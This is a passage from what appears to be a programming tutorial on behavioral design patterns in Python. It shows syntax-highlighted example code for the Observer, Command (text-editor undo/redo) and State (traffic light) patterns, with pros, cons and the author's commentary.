class="mi">157</span><span class="p">)</span> <span class="c1"># Alice doesn't get notified </span></code></pre> </div> <p><strong>Real-World Example: Event System</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Button</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_listeners</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">on_click</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">listener</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Register click listener</span><span class="sh">"""</span> <span class="n">self</span><span class="p">.</span><span class="n">_listeners</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">listener</span><span class="p">)</span> <span class="k">def</span> <span class="nf">click</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="sh">"""</span><span class="s">Simulate button click</span><span class="sh">"""</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Button clicked</span><span class="sh">"</span><span class="p">)</span> <span class="k">for</span> <span class="n">listener</span> <span class="ow">in</span> <span class="n">self</span><span class="p">.</span><span class="n">_listeners</span><span class="p">:</span> <span class="nf">listener</span><span class="p">()</span> <span class="c1"># Usage </span><span class="n">button</span> <span class="o">=</span> <span class="nc">Button</span><span class="p">()</span> <span class="n">button</span><span class="p">.</span><span class="nf">on_click</span><span class="p">(</span><span class="k">lambda</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Action 1: Save file</span><span class="sh">"</span><span class="p">))</span> <span class="n">button</span><span class="p">.</span><span class="nf">on_click</span><span class="p">(</span><span class="k">lambda</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Action 2: Send notification</span><span class="sh">"</span><span class="p">))</span> <span class="n">button</span><span class="p">.</span><span class="nf">on_click</span><span class="p">(</span><span class="k">lambda</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Action 3: Log event</span><span class="sh">"</span><span class="p">))</span> <span class="n">button</span><span class="p">.</span><span class="nf">click</span><span class="p">()</span> <span class="c1"># All listeners are notified </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Loose coupling between subject and observers</li> <li>Dynamic subscription/unsubscription</li> <li>Multiple observers supported</li> <li>Follows Single Responsibility</li> <li>Allows broadcast communication</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Observer order is unpredictable</li> <li>Memory leaks if observers aren't unsubscribed</li> <li>Can be hard to debug event chains</li> <li>Performance overhead with many observers</li> </ul> <p><strong>My Take:</strong></p> <p>Observer is fundamental to modern event-driven systems.</p> <p>You use it constantly:</p> <ul> <li> <strong>React/Vue</strong> with event handlers</li> <li> <strong>Django signals</strong> for model changes</li> <li> <strong>Webhook systems</strong> for notifications</li> <li> <strong>Event buses</strong> in microservices</li> </ul> <p>The key insight: <strong>When you have one thing changing and many things that need to react, use Observer.</strong></p> <p>Don't make objects directly call each other. Let them observe and react independently.</p> <h3> 3. Command Pattern </h3> <p>The Command pattern encapsulates a request as an object, thereby letting you parameterize clients with different requests, queue requests, and log requests.</p> <p>It turns an action into a standalone object.</p> <p>Think about a text editor's undo/redo. Every action (delete text, insert text, format) is a Command object.</p> <p>To undo, you just pop the last command off the stack and reverse it.</p> <p><strong>When to use it:</strong></p> <ul> <li>Undo/redo functionality</li> <li>Task queuing and scheduling</li> <li>Macro recording</li> <li>Asynchronous task execution</li> <li>Transaction management</li> <li>Request logging</li> <li>Callback systems</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">TextEditor</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="sh">""</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">self</span><span class="p">.</span><span class="n">undo_stack</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">insert_text</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">+=</span> <span class="n">text</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">append</span><span class="p">((</span><span class="sh">"</span><span class="s">insert</span><span class="sh">"</span><span class="p">,</span> <span class="n">text</span><span class="p">))</span> <span class="k">def</span> <span class="nf">delete_text</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span><span class="p">[:</span><span class="o">-</span><span class="n">count</span><span class="p">]</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">append</span><span class="p">((</span><span class="sh">"</span><span class="s">delete</span><span class="sh">"</span><span class="p">,</span> <span class="n">count</span><span class="p">))</span> <span class="k">def</span> <span class="nf">make_bold</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">):</span> <span class="c1"># Complex formatting logic </span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">append</span><span class="p">((</span><span class="sh">"</span><span class="s">bold</span><span class="sh">"</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">))</span> <span class="k">def</span> <span class="nf">undo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">:</span> <span class="k">return</span> <span class="n">action</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span> <span class="k">if</span> <span class="n">action</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sh">"</span><span class="s">insert</span><span class="sh">"</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span><span class="p">[:</span><span class="o">-</span><span class="nf">len</span><span class="p">(</span><span class="n">action</span><span class="p">[</span><span class="mi">1</span><span class="p">])]</span> <span class="k">elif</span> <span class="n">action</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sh">"</span><span class="s">delete</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># Can't easily undo delete without storing deleted text </span> <span class="k">pass</span> <span class="k">elif</span> <span class="n">action</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="sh">"</span><span class="s">bold</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># How do you undo bold? </span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">redo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="c1"># Redo logic (complicated and fragile) </span> <span class="k">pass</span> <span class="c1"># Problems: # - Undo logic is scattered # - Each action needs special undo handling # - Hard to add new actions # - Bug-prone </span></code></pre> </div> <h3> Good code (with Command) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># Command interface </span><span class="k">class</span> <span class="nc">Command</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">execute</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">undo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Concrete commands </span><span class="k">class</span> <span class="nc">InsertTextCommand</span><span class="p">(</span><span class="n">Command</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">editor</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span> <span class="o">=</span> <span class="n">editor</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">text</span> <span class="k">def</span> <span class="nf">execute</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span> <span class="o">+=</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="k">def</span> <span class="nf">undo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[:</span><span class="o">-</span><span class="nf">len</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">text</span><span class="p">)]</span> <span class="k">class</span> <span class="nc">DeleteTextCommand</span><span class="p">(</span><span class="n">Command</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">editor</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span> <span class="o">=</span> <span class="n">editor</span> <span class="n">self</span><span class="p">.</span><span class="n">count</span> <span class="o">=</span> <span class="n">count</span> <span class="n">self</span><span class="p">.</span><span class="n">deleted_text</span> <span class="o">=</span> <span class="bp">None</span> <span class="k">def</span> <span class="nf">execute</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">deleted_text</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="o">-</span><span class="n">self</span><span class="p">.</span><span class="n">count</span><span class="p">:]</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[:</span><span class="o">-</span><span class="n">self</span><span class="p">.</span><span class="n">count</span><span class="p">]</span> <span class="k">def</span> <span class="nf">undo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span> <span class="o">+=</span> <span class="n">self</span><span class="p">.</span><span class="n">deleted_text</span> <span class="k">class</span> <span class="nc">MakeBoldCommand</span><span class="p">(</span><span class="n">Command</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">editor</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span> <span class="o">=</span> <span class="n">editor</span> <span class="n">self</span><span class="p">.</span><span class="n">start</span> <span class="o">=</span> <span class="n">start</span> <span class="n">self</span><span class="p">.</span><span class="n">end</span> <span class="o">=</span> <span class="n">end</span> <span class="n">self</span><span class="p">.</span><span class="n">original_text</span> <span class="o">=</span> <span class="bp">None</span> <span class="k">def</span> <span class="nf">execute</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">original_text</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="n">self</span><span class="p">.</span><span class="n">start</span><span class="p">:</span><span class="n">self</span><span class="p">.</span><span class="n">end</span><span class="p">]</span> <span class="n">bold_text</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">**</span><span class="si">{</span><span class="n">self</span><span class="p">.</span><span class="n">original_text</span><span class="si">}</span><span class="s">**</span><span class="sh">"</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="p">(</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[:</span><span class="n">self</span><span class="p">.</span><span class="n">start</span><span class="p">]</span> <span class="o">+</span> <span class="n">bold_text</span> <span class="o">+</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="n">self</span><span class="p">.</span><span class="n">end</span><span class="p">:]</span> <span class="p">)</span> <span class="k">def</span> <span class="nf">undo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="p">(</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[:</span><span class="n">self</span><span class="p">.</span><span class="n">start</span><span class="p">]</span> <span class="o">+</span> <span class="n">self</span><span class="p">.</span><span class="n">original_text</span> <span class="o">+</span> <span class="n">self</span><span class="p">.</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">[</span><span class="n">self</span><span class="p">.</span><span class="n">start</span> <span class="o">+</span> <span class="nf">len</span><span class="p">(</span><span class="n">self</span><span class="p">.</span><span class="n">original_text</span><span class="p">)</span> <span class="o">+</span> <span class="mi">4</span><span class="p">:]</span> <span class="p">)</span> <span class="c1"># Invoker </span><span class="k">class</span> <span class="nc">TextEditor</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">text</span> <span class="o">=</span> <span class="sh">""</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">self</span><span class="p">.</span><span class="n">undo_stack</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">execute_command</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">command</span><span class="p">:</span> <span class="n">Command</span><span class="p">):</span> <span class="n">command</span><span class="p">.</span><span class="nf">execute</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">command</span><span class="p">)</span> <span class="k">def</span> <span class="nf">undo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">:</span> <span class="k">return</span> <span class="n">command</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span> <span class="n">command</span><span class="p">.</span><span class="nf">undo</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="n">undo_stack</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">command</span><span class="p">)</span> <span class="k">def</span> <span class="nf">redo</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">self</span><span class="p">.</span><span class="n">undo_stack</span><span class="p">:</span> <span class="k">return</span> <span class="n">command</span> <span class="o">=</span> <span class="n">self</span><span class="p">.</span><span class="n">undo_stack</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span> <span class="n">command</span><span class="p">.</span><span class="nf">execute</span><span class="p">()</span> <span class="n">self</span><span class="p">.</span><span class="n">history</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">command</span><span class="p">)</span> <span class="c1"># Client code </span><span class="n">editor</span> <span class="o">=</span> <span class="nc">TextEditor</span><span class="p">()</span> <span class="c1"># Execute commands </span><span class="n">insert_cmd</span> <span class="o">=</span> <span class="nc">InsertTextCommand</span><span class="p">(</span><span class="n">editor</span><span class="p">,</span> <span class="sh">"</span><span class="s">Hello </span><span class="sh">"</span><span class="p">)</span> <span class="n">editor</span><span class="p">.</span><span class="nf">execute_command</span><span class="p">(</span><span class="n">insert_cmd</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="c1"># "Hello " </span> <span class="n">insert_cmd2</span> <span class="o">=</span> <span class="nc">InsertTextCommand</span><span class="p">(</span><span class="n">editor</span><span class="p">,</span> <span class="sh">"</span><span class="s">World</span><span class="sh">"</span><span class="p">)</span> <span class="n">editor</span><span class="p">.</span><span class="nf">execute_command</span><span class="p">(</span><span class="n">insert_cmd2</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="c1"># "Hello World" </span> <span class="n">delete_cmd</span> <span class="o">=</span> <span class="nc">DeleteTextCommand</span><span class="p">(</span><span class="n">editor</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span> <span class="n">editor</span><span class="p">.</span><span class="nf">execute_command</span><span class="p">(</span><span class="n">delete_cmd</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="c1"># "Hello " </span> <span class="c1"># Undo </span><span class="n">editor</span><span class="p">.</span><span class="nf">undo</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="c1"># "Hello World" </span> <span class="n">editor</span><span class="p">.</span><span class="nf">undo</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="c1"># "Hello " </span> <span class="c1"># Redo </span><span class="n">editor</span><span class="p">.</span><span class="nf">redo</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">editor</span><span class="p">.</span><span class="n">text</span><span class="p">)</span> <span class="c1"># "Hello World" </span> <span class="c1"># Each command knows how to execute and undo itself # Adding new commands is easy # No special undo logic needed </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Decouples sender from receiver</li> <li>Undo/redo become trivial</li> <li>Easy to queue or schedule commands</li> <li>Easy to log command history</li> <li>Supports macros and composite commands</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>More classes for each command</li> <li>Memory overhead for storing commands</li> <li>Can become complex with many commands</li> </ul> <p><strong>My Take:</strong></p> <p>Command is essential for any system with undo/redo, queuing, or transaction management.</p> <p>The brilliance: <strong>Each action knows how to do itself and undo itself.</strong></p> <p>No need for centralized undo logic. Each command is responsible for its own reversal.</p> <p>This is how professional text editors, design tools, and version control systems work.</p> <h3> 4. State Pattern </h3> <p>The State pattern allows an object to alter its behavior when its internal state changes.</p> <p>The object will appear to change its class.</p> <p>Think about a traffic light:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Red → Green (can't go to Yellow directly) Green → Yellow (can't go to Red directly) Yellow → Red (can't go to Green directly) </code></pre> </div> <p>Without State, you have giant conditionals:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">red</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># Red behavior </span><span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">yellow</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># Yellow behavior </span><span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">green</span><span class="sh">"</span><span class="p">:</span> <span class="c1"># Green behavior </span></code></pre> </div> <p>With State, each state is a separate object that knows what it can do.</p> <p><strong>When to use it:</strong></p> <ul> <li>State machines (traffic lights, orders, workflows)</li> <li>UI state management</li> <li>Game states (menu, playing, paused, game over)</li> <li>Order status (pending, processing, shipped, delivered)</li> <li>Connection states (connecting, connected, disconnected)</li> <li>User states (logged out, logged in, admin)</li> </ul> <h3> Bad code (without pattern) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">TrafficLight</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">=</span> <span class="sh">"</span><span class="s">red</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">red</span><span class="sh">"</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">=</span> <span class="sh">"</span><span class="s">green</span><span class="sh">"</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🟢 Green light</span><span class="sh">"</span><span class="p">)</span> <span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">green</span><span class="sh">"</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">=</span> <span class="sh">"</span><span class="s">yellow</span><span class="sh">"</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🟡 Yellow light</span><span class="sh">"</span><span class="p">)</span> <span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">yellow</span><span class="sh">"</span><span class="p">:</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">=</span> <span class="sh">"</span><span class="s">red</span><span class="sh">"</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🔴 Red light</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">can_proceed</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">red</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">yellow</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">green</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">def</span> <span class="nf">get_description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">if</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">red</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Stop</span><span class="sh">"</span> <span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">yellow</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Prepare to stop</span><span class="sh">"</span> <span class="k">elif</span> <span class="n">self</span><span class="p">.</span><span class="n">state</span> <span class="o">==</span> <span class="sh">"</span><span class="s">green</span><span class="sh">"</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Go</span><span class="sh">"</span> <span class="c1"># Problems: # - Conditional logic everywhere # - Hard to add new states # - Logic is mixed with state data # - Transitions aren't clear </span></code></pre> </div> <h3> Good code (with State) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">abc</span> <span class="kn">import</span> <span class="n">ABC</span><span class="p">,</span> <span class="n">abstractmethod</span> <span class="c1"># State interface </span><span class="k">class</span> <span class="nc">TrafficLightState</span><span class="p">(</span><span class="n">ABC</span><span class="p">):</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">can_proceed</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="nd">@abstractmethod</span> <span class="k">def</span> <span class="nf">get_description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">pass</span> <span class="c1"># Concrete states </span><span class="k">class</span> <span class="nc">RedLightState</span><span class="p">(</span><span class="n">TrafficLightState</span><span class="p">):</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="n">context</span><span class="p">.</span><span class="nf">set_state</span><span class="p">(</span><span class="nc">GreenLightState</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🟢 Green light</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">can_proceed</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">def</span> <span class="nf">get_description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Stop</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">GreenLightState</span><span class="p">(</span><span class="n">TrafficLightState</span><span class="p">):</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="n">context</span><span class="p">.</span><span class="nf">set_state</span><span class="p">(</span><span class="nc">YellowLightState</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🟡 Yellow light</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">can_proceed</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">def</span> <span class="nf">get_description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Go</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">YellowLightState</span><span class="p">(</span><span class="n">TrafficLightState</span><span class="p">):</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">context</span><span class="p">):</span> <span class="n">context</span><span class="p">.</span><span class="nf">set_state</span><span class="p">(</span><span class="nc">RedLightState</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">🔴 Red light</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">can_proceed</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">def</span> <span class="nf">get_description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Prepare to stop</span><span class="sh">"</span> <span class="c1"># Context </span><span class="k">class</span> <span class="nc">TrafficLight</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_state</span> <span class="o">=</span> <span class="nc">RedLightState</span><span class="p">()</span> <span class="k">def</span> <span class="nf">set_state</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">state</span><span class="p">:</span> <span class="n">TrafficLightState</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_state</span> <span class="o">=</span> <span class="n">state</span> <span class="k">def</span> <span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">_state</span><span class="p">.</span><span class="nf">next</span><span class="p">(</span><span class="n">self</span><span class="p">)</span> <span class="k">def</span> <span class="nf">can_proceed</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">_state</span><span class="p">.</span><span class="nf">can_proceed</span><span class="p">()</span> <span class="k">def</span> <span class="nf">get_description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">_state</span><span class="p">.</span><span class="nf">get_description</span><span class="p">()</span> <span class="c1"># Client code </span><span class="n">light</span> <span class="o">=</span> <span class="nc">TrafficLight</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">light</span><span class="p">.</span><span class="nf">get_description</span><span class="p">())</span> <span class="c1"># Stop </span><span class="nf">print</span><span class="p">(</span><span class="n">light</span><span class="p">.</span><span class="nf">can_proceed</span><span class="p">())</span> <span class="c1"># False </span> <span class="n">light</span><span class="p">.</span><span class="nf">next</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">light</span><span class="p">.</span><span class="nf">get_description</span><span class="p">())</span> <span class="c1"># Go </span><span class="nf">print</span><span class="p">(</span><span class="n">light</span><span class="p">.</span><span class="nf">can_proceed</span><span class="p">())</span> <span class="c1"># True </span> <span class="n">light</span><span class="p">.</span><span class="nf">next</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">light</span><span class="p">.</span><span class="nf">get_description</span><span class="p">())</span> <span class="c1"># Prepare to stop </span> <span class="n">light</span><span class="p">.</span><span class="nf">next</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="n">light</span><span 